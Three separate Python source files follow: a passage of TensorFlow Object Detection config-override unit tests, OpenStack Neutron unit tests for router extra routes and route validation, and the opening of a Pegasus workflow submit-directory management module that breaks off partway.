_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
override_dict = {"mask_type": new_mask_type}
configs = config_util.merge_external_params_with_configs(
configs, kwargs_dict=override_dict)
self.assertEqual(new_mask_type, configs["train_input_config"].mask_type)
self.assertEqual(new_mask_type, configs["eval_input_configs"][0].mask_type)
def testUseMovingAverageForEval(self):
use_moving_averages_orig = False
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_config.use_moving_averages = use_moving_averages_orig
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
override_dict = {"eval_with_moving_averages": True}
configs = config_util.merge_external_params_with_configs(
configs, kwargs_dict=override_dict)
self.assertEqual(True, configs["eval_config"].use_moving_averages)
def testGetImageResizerConfig(self):
"""Tests that number of classes can be retrieved."""
model_config = model_pb2.DetectionModel()
model_config.faster_rcnn.image_resizer.fixed_shape_resizer.height = 100
model_config.faster_rcnn.image_resizer.fixed_shape_resizer.width = 300
image_resizer_config = config_util.get_image_resizer_config(model_config)
self.assertEqual(image_resizer_config.fixed_shape_resizer.height, 100)
self.assertEqual(image_resizer_config.fixed_shape_resizer.width, 300)
def testGetSpatialImageSizeFromFixedShapeResizerConfig(self):
image_resizer_config = image_resizer_pb2.ImageResizer()
image_resizer_config.fixed_shape_resizer.height = 100
image_resizer_config.fixed_shape_resizer.width = 200
image_shape = config_util.get_spatial_image_size(image_resizer_config)
self.assertAllEqual(image_shape, [100, 200])
def testGetSpatialImageSizeFromAspectPreservingResizerConfig(self):
image_resizer_config = image_resizer_pb2.ImageResizer()
image_resizer_config.keep_aspect_ratio_resizer.min_dimension = 100
image_resizer_config.keep_aspect_ratio_resizer.max_dimension = 600
image_resizer_config.keep_aspect_ratio_resizer.pad_to_max_dimension = True
image_shape = config_util.get_spatial_image_size(image_resizer_config)
self.assertAllEqual(image_shape, [600, 600])
def testGetSpatialImageSizeFromAspectPreservingResizerDynamic(self):
image_resizer_config = image_resizer_pb2.ImageResizer()
image_resizer_config.keep_aspect_ratio_resizer.min_dimension = 100
image_resizer_config.keep_aspect_ratio_resizer.max_dimension = 600
image_shape = config_util.get_spatial_image_size(image_resizer_config)
self.assertAllEqual(image_shape, [-1, -1])
def testGetSpatialImageSizeFromConditionalShapeResizer(self):
image_resizer_config = image_resizer_pb2.ImageResizer()
image_resizer_config.conditional_shape_resizer.size_threshold = 100
image_shape = config_util.get_spatial_image_size(image_resizer_config)
self.assertAllEqual(image_shape, [-1, -1])
def testEvalShuffle(self):
"""Tests that `eval_shuffle` keyword arguments are applied correctly."""
original_shuffle = True
desired_shuffle = False
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_input_reader.add().shuffle = original_shuffle
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
override_dict = {"eval_shuffle": desired_shuffle}
configs = config_util.merge_external_params_with_configs(
configs, kwargs_dict=override_dict)
self.assertEqual(desired_shuffle, configs["eval_input_configs"][0].shuffle)
def testTrainShuffle(self):
"""Tests that `train_shuffle` keyword arguments are applied correctly."""
original_shuffle = True
desired_shuffle = False
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.train_input_reader.shuffle = original_shuffle
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
override_dict = {"train_shuffle": desired_shuffle}
configs = config_util.merge_external_params_with_configs(
configs, kwargs_dict=override_dict)
train_shuffle = configs["train_input_config"].shuffle
self.assertEqual(desired_shuffle, train_shuffle)
def testOverWriteRetainOriginalImages(self):
"""Tests that `train_shuffle` keyword arguments are applied correctly."""
original_retain_original_images = True
desired_retain_original_images = False
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_config.retain_original_images = (
original_retain_original_images)
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
override_dict = {
"retain_original_images_in_eval": desired_retain_original_images
}
configs = config_util.merge_external_params_with_configs(
configs, kwargs_dict=override_dict)
retain_original_images = configs["eval_config"].retain_original_images
self.assertEqual(desired_retain_original_images, retain_original_images)
def testOverwriteAllEvalSampling(self):
original_num_eval_examples = 1
new_num_eval_examples = 10
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_input_reader.add().sample_1_of_n_examples = (
original_num_eval_examples)
pipeline_config.eval_input_reader.add().sample_1_of_n_examples = (
original_num_eval_examples)
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
override_dict = {"sample_1_of_n_eval_examples": new_num_eval_examples}
configs = config_util.merge_external_params_with_configs(
configs, kwargs_dict=override_dict)
for eval_input_config in configs["eval_input_configs"]:
self.assertEqual(new_num_eval_examples,
eval_input_config.sample_1_of_n_examples)
def testOverwriteAllEvalNumEpochs(self):
original_num_epochs = 10
new_num_epochs = 1
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_input_reader.add().num_epochs = original_num_epochs
pipeline_config.eval_input_reader.add().num_epochs = original_num_epochs
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
override_dict = {"eval_num_epochs": new_num_epochs}
configs = config_util.merge_external_params_with_configs(
configs, kwargs_dict=override_dict)
for eval_input_config in configs["eval_input_configs"]:
self.assertEqual(new_num_epochs, eval_input_config.num_epochs)
def testUpdateMaskTypeForAllInputConfigs(self):
original_mask_type = input_reader_pb2.NUMERICAL_MASKS
new_mask_type = input_reader_pb2.PNG_MASKS
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
train_config = pipeline_config.train_input_reader
train_config.mask_type = original_mask_type
eval_1 = pipeline_config.eval_input_reader.add()
eval_1.mask_type = original_mask_type
eval_1.name = "eval_1"
eval_2 = pipeline_config.eval_input_reader.add()
eval_2.mask_type = original_mask_type
eval_2.name = "eval_2"
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
override_dict = {"mask_type": new_mask_type}
configs = config_util.merge_external_params_with_configs(
configs, kwargs_dict=override_dict)
self.assertEqual(configs["train_input_config"].mask_type, new_mask_type)
for eval_input_config in configs["eval_input_configs"]:
self.assertEqual(eval_input_config.mask_type, new_mask_type)
def testErrorOverwritingMultipleInputConfig(self):
original_shuffle = False
new_shuffle = True
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
eval_1 = pipeline_config.eval_input_reader.add()
eval_1.shuffle = original_shuffle
eval_1.name = "eval_1"
eval_2 = pipeline_config.eval_input_reader.add()
eval_2.shuffle = original_shuffle
eval_2.name = "eval_2"
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
override_dict = {"eval_shuffle": new_shuffle}
with self.assertRaises(ValueError):
configs = config_util.merge_external_params_with_configs(
configs, kwargs_dict=override_dict)
def testCheckAndParseInputConfigKey(self):
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_input_reader.add().name = "eval_1"
pipeline_config.eval_input_reader.add().name = "eval_2"
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
specific_shuffle_update_key = "eval_input_configs:eval_2:shuffle"
is_valid_input_config_key, key_name, input_name, field_name = (
config_util.check_and_parse_input_config_key(
configs, specific_shuffle_update_key))
self.assertTrue(is_valid_input_config_key)
self.assertEqual(key_name, "eval_input_configs")
self.assertEqual(input_name, "eval_2")
self.assertEqual(field_name, "shuffle")
legacy_shuffle_update_key = "eval_shuffle"
is_valid_input_config_key, key_name, input_name, field_name = (
config_util.check_and_parse_input_config_key(configs,
legacy_shuffle_update_key))
self.assertTrue(is_valid_input_config_key)
self.assertEqual(key_name, "eval_input_configs")
self.assertEqual(input_name, None)
self.assertEqual(field_name, "shuffle")
non_input_config_update_key = "label_map_path"
is_valid_input_config_key, key_name, input_name, field_name = (
config_util.check_and_parse_input_config_key(
configs, non_input_config_update_key))
self.assertFalse(is_valid_input_config_key)
self.assertEqual(key_name, None)
self.assertEqual(input_name, None)
self.assertEqual(field_name, "label_map_path")
with self.assertRaisesRegexp(ValueError,
"Invalid key format when overriding configs."):
config_util.check_and_parse_input_config_key(
configs, "train_input_config:shuffle")
with self.assertRaisesRegexp(
ValueError, "Invalid key_name when overriding input config."):
config_util.check_and_parse_input_config_key(
configs, "invalid_key_name:train_name:shuffle")
with self.assertRaisesRegexp(
ValueError, "Invalid input_name when overriding input config."):
config_util.check_and_parse_input_config_key(
configs, "eval_input_configs:unknown_eval_name:shuffle")
with self.assertRaisesRegexp(
ValueError, "Invalid field_name when overriding input config."):
config_util.check_and_parse_input_config_key(
configs, "eval_input_configs:eval_2:unknown_field_name")
def testUpdateInputReaderConfigSuccess(self):
original_shuffle = False
new_shuffle = True
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.train_input_reader.shuffle = original_shuffle
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
config_util.update_input_reader_config(
configs,
key_name="train_input_config",
input_name=None,
field_name="shuffle",
value=new_shuffle)
self.assertEqual(configs["train_input_config"].shuffle, new_shuffle)
config_util.update_input_reader_config(
configs,
key_name="train_input_config",
input_name=None,
field_name="shuffle",
value=new_shuffle)
self.assertEqual(configs["train_input_config"].shuffle, new_shuffle)
def testUpdateInputReaderConfigErrors(self):
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_input_reader.add().name = "same_eval_name"
pipeline_config.eval_input_reader.add().name = "same_eval_name"
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
with self.assertRaisesRegexp(ValueError,
"Duplicate input name found when overriding."):
config_util.update_input_reader_config(
configs,
key_name="eval_input_configs",
input_name="same_eval_name",
field_name="shuffle",
value=False)
with self.assertRaisesRegexp(
ValueError, "Input name name_not_exist not found when overriding."):
config_util.update_input_reader_config(
configs,
key_name="eval_input_configs",
input_name="name_not_exist",
field_name="shuffle",
value=False)
with self.assertRaisesRegexp(ValueError,
"Unknown input config overriding."):
config_util.update_input_reader_config(
configs,
key_name="eval_input_configs",
input_name=None,
field_name="shuffle",
value=False)
def testOverWriteRetainOriginalImageAdditionalChannels(self):
"""Tests that keyword arguments are applied correctly."""
original_retain_original_image_additional_channels = True
desired_retain_original_image_additional_channels = False
pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_config.retain_original_image_additional_channels = (
original_retain_original_image_additional_channels)
_write_config(pipeline_config, pipeline_config_path)
configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
override_dict = {
"retain_original_image_additional_channels_in_eval":
desired_retain_original_image_additional_channels
}
configs = config_util.merge_external_params_with_configs(
configs, kwargs_dict=override_dict)
retain_original_image_additional_channels = configs[
"eval_config"].retain_original_image_additional_channels
self.assertEqual(desired_retain_original_image_additional_channels,
retain_original_image_additional_channels)
def testRemoveUnecessaryEma(self):
input_dict = {
"expanded_conv_10/project/act_quant/min":
1,
"FeatureExtractor/MobilenetV2_2/expanded_conv_5/expand/act_quant/min":
2,
"expanded_conv_10/expand/BatchNorm/gamma/min/ExponentialMovingAverage":
3,
"expanded_conv_3/depthwise/BatchNorm/beta/max/ExponentialMovingAverage":
4,
"BoxPredictor_1/ClassPredictor_depthwise/act_quant":
5
}
no_ema_collection = ["/min", "/max"]
output_dict = {
"expanded_conv_10/project/act_quant/min":
1,
"FeatureExtractor/MobilenetV2_2/expanded_conv_5/expand/act_quant/min":
2,
"expanded_conv_10/expand/BatchNorm/gamma/min":
3,
"expanded_conv_3/depthwise/BatchNorm/beta/max":
4,
"BoxPredictor_1/ClassPredictor_depthwise/act_quant":
5
}
self.assertEqual(
output_dict,
config_util.remove_unecessary_ema(input_dict, no_ema_collection))
if __name__ == "__main__":
tf.test.main()
| |
# Copyright 2013, Nachi Ueno, NTT MCL, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_utils import uuidutils
from webob import exc
from neutron.common import constants
from neutron.common import utils
from neutron import context
from neutron.db import extraroute_db
from neutron.extensions import extraroute
from neutron.extensions import l3
from neutron.tests.unit.api.v2 import test_base
from neutron.tests.unit.extensions import test_l3 as test_l3
_uuid = uuidutils.generate_uuid
_get_path = test_base._get_path
class ExtraRouteTestExtensionManager(object):
def get_resources(self):
l3.RESOURCE_ATTRIBUTE_MAP['routers'].update(
extraroute.EXTENDED_ATTRIBUTES_2_0['routers'])
return l3.L3.get_resources()
def get_actions(self):
return []
def get_request_extensions(self):
return []
# This plugin class is for tests with plugin that integrates L3.
class TestExtraRouteIntPlugin(test_l3.TestL3NatIntPlugin,
extraroute_db.ExtraRoute_db_mixin):
supported_extension_aliases = ["external-net", "router", "extraroute"]
# A fake l3 service plugin class with extra route capability for
# plugins that delegate away L3 routing functionality
class TestExtraRouteL3NatServicePlugin(test_l3.TestL3NatServicePlugin,
extraroute_db.ExtraRoute_db_mixin):
supported_extension_aliases = ["router", "extraroute"]
class ExtraRouteDBTestCaseBase(object):
def _routes_update_prepare(
self, router_id, subnet_id,
port_id, routes, skip_add=False, tenant_id=None):
if not skip_add:
self._router_interface_action(
'add', router_id, subnet_id, port_id, tenant_id=None)
ctxt = context.Context('', tenant_id) if tenant_id else None
self._update('routers', router_id, {'router': {'routes': routes}},
neutron_context=ctxt)
return self._show('routers', router_id)
def _routes_update_cleanup(self, port_id, subnet_id, router_id, routes):
self._update('routers', router_id, {'router': {'routes': routes}})
self._router_interface_action('remove', router_id, subnet_id, port_id)
def test_route_update_with_one_route(self):
routes = [{'destination': '135.207.0.0/16', 'nexthop': '10.0.1.3'}]
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
body = self._routes_update_prepare(r['router']['id'],
None, p['port']['id'],
routes)
self.assertEqual(routes, body['router']['routes'])
self._routes_update_cleanup(p['port']['id'],
None, r['router']['id'], [])
def test_route_update_with_external_route(self):
my_tenant = 'tenant1'
routes = [{'destination': '135.207.0.0/16', 'nexthop': '10.0.1.3'}]
with self.subnet(cidr='10.0.1.0/24', tenant_id='notme') as ext_subnet:
self._set_net_external(ext_subnet['subnet']['network_id'])
ext_info = {'network_id': ext_subnet['subnet']['network_id']}
with self.router(
external_gateway_info=ext_info, tenant_id=my_tenant) as r:
body = self._routes_update_prepare(
r['router']['id'], None, None, routes, skip_add=True,
tenant_id=my_tenant)
self.assertEqual(routes, body['router']['routes'])
def test_route_update_with_route_via_another_tenant_subnet(self):
my_tenant = 'tenant1'
routes = [{'destination': '135.207.0.0/16', 'nexthop': '10.0.1.3'}]
with self.subnet(cidr='10.0.1.0/24', tenant_id='notme') as subnet:
with self.router(tenant_id=my_tenant) as r:
body = self._routes_update_prepare(
r['router']['id'], subnet['subnet']['id'], None, routes,
tenant_id=my_tenant)
self.assertEqual(routes, body['router']['routes'])
def test_route_clear_routes_with_None(self):
routes = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'},
{'destination': '12.0.0.0/8',
'nexthop': '10.0.1.4'},
{'destination': '141.212.0.0/16',
'nexthop': '10.0.1.5'}]
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._routes_update_prepare(r['router']['id'],
None, p['port']['id'], routes)
body = self._update('routers', r['router']['id'],
{'router': {'routes': None}})
self.assertEqual([], body['router']['routes'])
self._routes_update_cleanup(p['port']['id'],
None, r['router']['id'], [])
def test_router_interface_in_use_by_route(self):
routes = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'}]
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
body = self._routes_update_prepare(r['router']['id'],
None, p['port']['id'],
routes)
self.assertEqual(routes, body['router']['routes'])
self._router_interface_action(
'remove',
r['router']['id'],
None,
p['port']['id'],
expected_code=exc.HTTPConflict.code)
self._routes_update_cleanup(p['port']['id'],
None, r['router']['id'], [])
def test_route_update_with_multi_routes(self):
routes = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'},
{'destination': '12.0.0.0/8',
'nexthop': '10.0.1.4'},
{'destination': '141.212.0.0/16',
'nexthop': '10.0.1.5'}]
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
body = self._routes_update_prepare(r['router']['id'],
None, p['port']['id'],
routes)
self.assertEqual(
sorted(body['router']['routes'],
key=utils.safe_sort_key),
sorted(routes, key=utils.safe_sort_key))
self._routes_update_cleanup(p['port']['id'],
None, r['router']['id'], [])
def test_routes_update_for_multiple_routers(self):
routes1 = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.0.3'}]
routes2 = [{'destination': '12.0.0.0/8',
'nexthop': '10.0.0.4'}]
with self.router() as r1,\
self.router() as r2,\
self.subnet(cidr='10.0.0.0/24') as s:
with self.port(subnet=s) as p1, self.port(subnet=s) as p2:
body = self._routes_update_prepare(r1['router']['id'],
None, p1['port']['id'],
routes1)
self.assertEqual(routes1, body['router']['routes'])
body = self._routes_update_prepare(r2['router']['id'],
None, p2['port']['id'],
routes2)
self.assertEqual(routes2, body['router']['routes'])
self._routes_update_cleanup(p1['port']['id'],
None, r1['router']['id'], [])
self._routes_update_cleanup(p2['port']['id'],
None, r2['router']['id'], [])
def test_router_update_delete_routes(self):
routes_orig = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'},
{'destination': '12.0.0.0/8',
'nexthop': '10.0.1.4'},
{'destination': '141.212.0.0/16',
'nexthop': '10.0.1.5'}]
routes_left = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'},
{'destination': '141.212.0.0/16',
'nexthop': '10.0.1.5'}]
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
body = self._routes_update_prepare(r['router']['id'],
None, p['port']['id'],
routes_orig)
self.assertEqual(
sorted(body['router']['routes'],
key=utils.safe_sort_key),
sorted(routes_orig, key=utils.safe_sort_key))
body = self._routes_update_prepare(r['router']['id'],
None, p['port']['id'],
routes_left,
skip_add=True)
self.assertEqual(
sorted(body['router']['routes'],
key=utils.safe_sort_key),
sorted(routes_left, key=utils.safe_sort_key))
self._routes_update_cleanup(p['port']['id'],
None, r['router']['id'], [])
def _test_malformed_route(self, routes):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
self._update('routers', r['router']['id'],
{'router': {'routes': routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_no_destination_route(self):
self._test_malformed_route([{'nexthop': '10.0.1.6'}])
def test_no_nexthop_route(self):
self._test_malformed_route({'destination': '135.207.0.0/16'})
def test_none_destination(self):
self._test_malformed_route([{'destination': None,
'nexthop': '10.0.1.3'}])
def test_none_nexthop(self):
self._test_malformed_route([{'destination': '135.207.0.0/16',
'nexthop': None}])
def test_nexthop_is_port_ip(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
port_ip = p['port']['fixed_ips'][0]['ip_address']
routes = [{'destination': '135.207.0.0/16',
'nexthop': port_ip}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_router_update_with_too_many_routes(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
routes = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'},
{'destination': '12.0.0.0/8',
'nexthop': '10.0.1.4'},
{'destination': '141.212.0.0/16',
'nexthop': '10.0.1.5'},
{'destination': '192.168.0.0/16',
'nexthop': '10.0.1.6'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_router_update_with_dup_address(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
routes = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'},
{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_router_update_with_invalid_ip_address(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
routes = [{'destination': '512.207.0.0/16',
'nexthop': '10.0.1.3'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
routes = [{'destination': '127.207.0.0/48',
'nexthop': '10.0.1.3'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
routes = [{'destination': 'invalid_ip_address',
'nexthop': '10.0.1.3'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_router_update_with_invalid_nexthop_ip(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
routes = [{'destination': '127.207.0.0/16',
'nexthop': ' 300.10.10.4'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_router_update_with_nexthop_is_outside_port_subnet(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
routes = [{'destination': '127.207.0.0/16',
'nexthop': ' 20.10.10.4'}]
self._update('routers', r['router']['id'],
{'router': {'routes':
routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
def test_router_update_on_external_port(self):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
self._set_net_external(s['subnet']['network_id'])
self._add_external_gateway_to_router(
r['router']['id'],
s['subnet']['network_id'])
body = self._show('routers', r['router']['id'])
net_id = body['router']['external_gateway_info']['network_id']
self.assertEqual(net_id, s['subnet']['network_id'])
port_res = self._list_ports(
'json',
200,
s['subnet']['network_id'],
tenant_id=r['router']['tenant_id'],
device_owner=constants.DEVICE_OWNER_ROUTER_GW)
port_list = self.deserialize('json', port_res)
self.assertEqual(1, len(port_list['ports']))
routes = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'}]
body = self._update('routers', r['router']['id'],
{'router': {'routes':
routes}})
body = self._show('routers', r['router']['id'])
self.assertEqual(routes, body['router']['routes'])
self._remove_external_gateway_from_router(
r['router']['id'],
s['subnet']['network_id'])
body = self._show('routers', r['router']['id'])
gw_info = body['router']['external_gateway_info']
self.assertIsNone(gw_info)
def test_router_list_with_sort(self):
with self.router(name='router1') as router1,\
self.router(name='router2') as router2,\
self.router(name='router3') as router3:
self._test_list_with_sort('router', (router3, router2, router1),
[('name', 'desc')])
def test_router_list_with_pagination(self):
with self.router(name='router1') as router1,\
self.router(name='router2') as router2,\
self.router(name='router3') as router3:
self._test_list_with_pagination('router',
(router1, router2, router3),
('name', 'asc'), 2, 2)
def test_router_list_with_pagination_reverse(self):
with self.router(name='router1') as router1,\
self.router(name='router2') as router2,\
self.router(name='router3') as router3:
self._test_list_with_pagination_reverse('router',
(router1, router2,
router3),
('name', 'asc'), 2, 2)
class ExtraRouteDBIntTestCase(test_l3.L3NatDBIntTestCase,
ExtraRouteDBTestCaseBase):
def setUp(self, plugin=None, ext_mgr=None):
if not plugin:
plugin = ('neutron.tests.unit.extensions.test_extraroute.'
'TestExtraRouteIntPlugin')
# for these tests we need to enable overlapping ips
cfg.CONF.set_default('allow_overlapping_ips', True)
cfg.CONF.set_default('max_routes', 3)
ext_mgr = ExtraRouteTestExtensionManager()
super(test_l3.L3BaseForIntTests, self).setUp(plugin=plugin,
ext_mgr=ext_mgr)
self.setup_notification_driver()
class ExtraRouteDBSepTestCase(test_l3.L3NatDBSepTestCase,
ExtraRouteDBTestCaseBase):
def setUp(self):
# the plugin without L3 support
plugin = 'neutron.tests.unit.extensions.test_l3.TestNoL3NatPlugin'
# the L3 service plugin
l3_plugin = ('neutron.tests.unit.extensions.test_extraroute.'
'TestExtraRouteL3NatServicePlugin')
service_plugins = {'l3_plugin_name': l3_plugin}
# for these tests we need to enable overlapping ips
cfg.CONF.set_default('allow_overlapping_ips', True)
cfg.CONF.set_default('max_routes', 3)
ext_mgr = ExtraRouteTestExtensionManager()
super(test_l3.L3BaseForSepTests, self).setUp(
plugin=plugin, ext_mgr=ext_mgr,
service_plugins=service_plugins)
self.setup_notification_driver()
| |
"""."""
import glob
import logging
import os
import shutil
import tarfile
from os.path import expanduser
from Pegasus.command import CompoundCommand, LoggingCommand
from Pegasus.db import connection
from Pegasus.db.schema import (
EnsembleWorkflow,
MasterWorkflow,
MasterWorkflowstate,
Workflow,
Workflowstate,
)
from Pegasus.tools import utils
log = logging.getLogger(__name__)
class SubmitDirException(Exception):
pass
class MasterDatabase:
def __init__(self, session):
self.session = session
def get_master_workflow(self, wf_uuid, submit_dir=None):
q = self.session.query(MasterWorkflow)
q = q.filter(MasterWorkflow.wf_uuid == wf_uuid)
if submit_dir:
q = q.filter(MasterWorkflow.submit_dir == submit_dir)
wf = q.first()
return wf
def get_master_workflow_for_submitdir(self, submitdir):
q = self.session.query(MasterWorkflow)
q = q.filter(MasterWorkflow.submit_dir == submitdir)
return q.all()
def get_ensemble_workflow(self, wf_uuid):
q = self.session.query(EnsembleWorkflow)
q = q.filter(EnsembleWorkflow.wf_uuid == wf_uuid)
return q.first()
def delete_master_workflow(self, wf_uuid, submit_dir=None):
w = self.get_master_workflow(wf_uuid, submit_dir=submit_dir)
if w is None:
return
# Delete any ensemble workflows
q = self.session.query(EnsembleWorkflow)
q = q.filter(EnsembleWorkflow.wf_uuid == wf_uuid)
q.delete()
# Delete the workflow
q = self.session.query(MasterWorkflow)
q = q.filter(MasterWorkflow.wf_id == w.wf_id)
q.delete()
class WorkflowDatabase:
def __init__(self, session):
self.session = session
def delete_workflow(self, wf_uuid):
q = self.session.query(Workflow)
q = q.filter(Workflow.wf_uuid == wf_uuid)
w = q.first()
# If not found, do nothing
if w is None:
log.warning("Workflow not found in workflow DB: %s" % wf_uuid)
return
# Delete it
self.session.delete(w)
def get_workflow(self, wf_uuid):
q = self.session.query(Workflow)
q = q.filter(Workflow.wf_uuid == wf_uuid)
return q.first()
def get_workflow_states(self, wf_id):
q = self.session.query(Workflowstate)
q = q.filter(Workflowstate.wf_id == wf_id)
return q.all()
def update_submit_dirs(self, root_wf_id, src, dest):
q = self.session.query(Workflow)
q = q.filter(Workflow.root_wf_id == root_wf_id)
for wf in q.all():
log.info("Old submit dir: %s" % wf.submit_dir)
wf.submit_dir = wf.submit_dir.replace(src, dest)
log.info("New submit dir: %s" % wf.submit_dir)
class SubmitDir:
def __init__(self, submitdir, raise_err=True):
self.submitdir = os.path.abspath(submitdir)
self.submitdir_exists = True
if not os.path.isdir(submitdir):
self.submitdir_exists = False
if raise_err is False:
return
raise SubmitDirException("Invalid submit dir: %s" % submitdir)
self.braindump_file = os.path.join(self.submitdir, "braindump.yml")
if not os.path.isfile(self.braindump_file):
self.braindump_file = os.path.join(self.submitdir, "braindump.txt")
# Read the braindump file
self.braindump = utils.slurp_braindb(os.path.join(self.submitdir))
# Read some attributes from braindump file
self.wf_uuid = self.braindump["wf_uuid"]
self.root_wf_uuid = self.braindump["root_wf_uuid"]
self.user = self.braindump["user"]
self.archname = os.path.join(self.submitdir, "archive.tar.gz")
